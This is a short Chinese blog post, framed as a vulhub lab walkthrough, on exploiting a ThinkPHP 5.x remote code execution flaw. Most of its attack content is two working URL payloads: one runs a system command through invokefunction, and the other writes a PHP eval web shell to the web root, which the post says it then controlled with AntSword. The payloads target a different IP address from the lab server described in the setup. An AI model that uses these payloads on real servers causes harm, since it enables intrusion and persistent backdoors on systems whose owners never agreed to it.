Thinkphp(TP)框架漏洞攻略

故事与他6452025-03-26 2:07

Thinkphp5x远程命令执⾏及getshell

环境配置

云服务器:121.40.229.129:8080

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

访问靶场:http://121.40.229.129:8080/

远程命令执⾏

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

根⽬录⽣成11.php ⽂件

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval(\$_POST[cmd]);?%3E%22%20%3E11.php

使用蚁剑连接成功

相关推荐
GP9_小怪兽10 分钟前
deepseek流数据开发环境可以分批次接收 到服务器上返回的是流但数据一次就返回了
服务器
源远流长jerry24 分钟前
网络相关的知识总结1
网络
CodeAaron27 分钟前
量子计算与网络架构的双重飞跃:微软QPU如何携手代理IP重塑数字未来
网络·架构·量子计算
FS_Marking30 分钟前
如何实现POE交换机串联?
网络·信息与通信
冯浩(grow up)1 小时前
使用vs code终端访问mysql报错解决
android·数据库·mysql
qq63044033481 小时前
有价值的面试问题
linux·运维·服务器
virelin_Y.lin1 小时前
系统与网络安全------网络应用基础(3)
网络·web安全·智能路由器
努力努力再努力wz1 小时前
【c++入门系列】:引用以及内联函数详解
java·运维·服务器·c语言·开发语言·c++
火绒终端安全管理系统1 小时前
游戏MOD伴随盗号风险,仿冒网站借“风灵月影”窃密【火绒企业版V2.0】
网络·安全·游戏·网络安全·火绒安全
代码续发2 小时前
为什么要将项目部署到外部tomcat
java·tomcat
热门推荐
01RAG 实践- Ollama+RagFlow 部署本地知识库02如何在WPS和Word/Excel中直接使用DeepSeek功能03DeepSeek各版本说明与优缺点分析04本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程05本地部署DeepSeek教程(Mac版本)06从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑07苍穹外卖面试总结08FreeCAD傻瓜教程之创建参数化几何图形-螺旋体、平面、球体、椭球体、圆柱体、圆锥体、棱柱、椭圆09DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具10JS闭包不理解?一杯咖啡的时间带你轻松理解闭包!